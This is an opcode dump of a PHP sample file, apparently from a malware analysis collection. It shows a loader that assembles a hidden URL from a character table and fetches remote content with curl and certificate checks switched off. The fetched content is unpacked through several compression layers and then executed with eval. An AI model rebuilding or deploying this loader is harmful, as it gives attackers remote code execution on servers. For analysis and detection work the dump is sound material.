|filename:|/root/samples/7up.php
|functionname:|(null)
|numberofops:|61
|compiledvars:|!0=$DNZW,|!1=$BIlc,|!2=$QrMk,|!3=$Kkav,|!4=$xCpJ
|line|#*|||op|fetch|ext|return|operands
|1|0|E>|INIT_FCALL||||'array_merge'|
||1||INIT_FCALL||||'range'|
||2||SEND_VAL||||'a'|
||3||SEND_VAL||||'z'|
||4||DO_ICALL|||$5|
||5||SEND_VAR||||$5|
||6||INIT_FCALL||||'range'|
||7||SEND_VAL||||'A'|
||8||SEND_VAL||||'Z'|
||9||DO_ICALL|||$6|
||10||SEND_VAR||||$6|
||11||INIT_FCALL||||'range'|
||12||SEND_VAL||||'0'|
||13||SEND_VAL||||'9'|
||14||DO_ICALL|||$7|
||15||SEND_VAR||||$7|
||16||SEND_VAL||||<array>|
||17||DO_ICALL|||$8|
||18||ASSIGN||||!0|,|$8|
||19||ASSIGN||||!1|,|<array>|
||20||ASSIGN||||!2|,|''|
||21|>|FE_RESET_R|||$12|!1|,|->26|
||22|>>|FE_FETCH_R||||$12|,|!3|,->26|
||23|>|FETCH_DIM_R|||~13|!0|,|!3|
||24||ASSIGN_OP||8||!2|,|~13|
||25|>|JMP||||->22|
||26|>|FE_FREE||||$12|
||27||CAST||6|~15|!2|
||28||ASSIGN||||!4|,|~15|
||29||BEGIN_SILENCE|||~17|
||30||INIT_FCALL||||'gzuncompress'|
||31||INIT_FCALL||||'gzinflate'|
||32||INIT_FCALL||||'gzuncompress'|
||33||INIT_FCALL||||'gzinflate'|
||34||INIT_FCALL||||'gzuncompress'|
||35||INIT_FCALL||||'gzinflate'|
||36||INIT_FCALL||||'gzuncompress'|
||37||INIT_FCALL||||'gzinflate'|
||38||INIT_FCALL||||'tpjp'|
||39||SEND_VAR||||!4|
||40||DO_FCALL||0|$18|
||41||SEND_VAR||||$18|
||42||DO_ICALL|||$19|
||43||SEND_VAR||||$19|
||44||DO_ICALL|||$20|
||45||SEND_VAR||||$20|
||46||DO_ICALL|||$21|
||47||SEND_VAR||||$21|
||48||DO_ICALL|||$22|
||49||SEND_VAR||||$22|
||50||DO_ICALL|||$23|
||51||SEND_VAR||||$23|
||52||DO_ICALL|||$24|
||53||SEND_VAR||||$24|
||54||DO_ICALL|||$25|
||55||SEND_VAR||||$25|
||56||DO_ICALL|||$26|
||57||CONCAT|||~27|'%3F%3E'|,|$26|
||58||INCLUDE_OR_EVAL||||~27|,|EVAL|
||59||END_SILENCE||||~17|
|2|60|>|RETURN||||1|
|
|Functiontpjp:
|filename:|/root/samples/7up.php
|functionname:|TpjP
|numberofops:|61
|compiledvars:|!0=$undefined,|!1=$ZZzY,|!2=$hSUm
|line|#*|||op|fetch|ext|return|operands
|1|0|E>|RECV|||!0|
||1||INIT_FCALL_BY_NAME||||'curl_init'|
||2||DO_FCALL||0|$3|
||3||ASSIGN||||!1|,|$3|
||4||INIT_FCALL_BY_NAME||||'curl_setopt'|
||5||SEND_VAR_EX||||!1|
||6||FETCH_CONSTANT|||~5|'CURLOPT_URL'|
||7||SEND_VAL_EX||||~5|
||8||SEND_VAR_EX||||!0|
||9||DO_FCALL||0||
||10||INIT_FCALL_BY_NAME||||'curl_setopt'|
||11||SEND_VAR_EX||||!1|
||12||FETCH_CONSTANT|||~7|'CURLOPT_RETURNTRANSFER'|
||13||SEND_VAL_EX||||~7|
||14||SEND_VAL_EX||||<true>|
||15||DO_FCALL||0||
||16||INIT_FCALL_BY_NAME||||'curl_setopt'|
||17||SEND_VAR_EX||||!1|
||18||FETCH_CONSTANT|||~9|'CURLOPT_SSL_VERIFYPEER'|
||19||SEND_VAL_EX||||~9|
||20||SEND_VAL_EX||||<false>|
||21||DO_FCALL||0||
||22||INIT_FCALL_BY_NAME||||'curl_setopt'|
||23||SEND_VAR_EX||||!1|
||24||FETCH_CONSTANT|||~11|'CURLOPT_SSL_VERIFYHOST'|
||25||SEND_VAL_EX||||~11|
||26||SEND_VAL_EX||||<false>|
||27||DO_FCALL||0||
||28||INIT_FCALL_BY_NAME||||'curl_exec'|
||29||SEND_VAR_EX||||!1|
||30||DO_FCALL||0|$13|
||31||ASSIGN||||!2|,|$13|
||32||INIT_FCALL_BY_NAME||||'curl_close'|
||33||SEND_VAR_EX||||!1|
||34||DO_FCALL||0||
||35||INIT_FCALL||||'gzdeflate'|
||36||INIT_FCALL||||'gzcompress'|
||37||INIT_FCALL||||'gzdeflate'|
||38||INIT_FCALL||||'gzcompress'|
||39||INIT_FCALL||||'gzdeflate'|
||40||INIT_FCALL||||'gzcompress'|
||41||INIT_FCALL||||'gzdeflate'|
||42||INIT_FCALL||||'gzcompress'|
||43||SEND_VAR||||!2|
||44||DO_ICALL|||$16|
||45||SEND_VAR||||$16|
||46||DO_ICALL|||$17|
||47||SEND_VAR||||$17|
||48||DO_ICALL|||$18|
||49||SEND_VAR||||$18|
||50||DO_ICALL|||$19|
||51||SEND_VAR||||$19|
||52||DO_ICALL|||$20|
||53||SEND_VAR||||$20|
||54||DO_ICALL|||$21|
||55||SEND_VAR||||$21|
||56||DO_ICALL|||$22|
||57||SEND_VAR||||$22|
||58||DO_ICALL|||$23|
||59|>|RETURN||||$23|
||60|*>|RETURN||||null|
|
|Endoffunctiontpjp

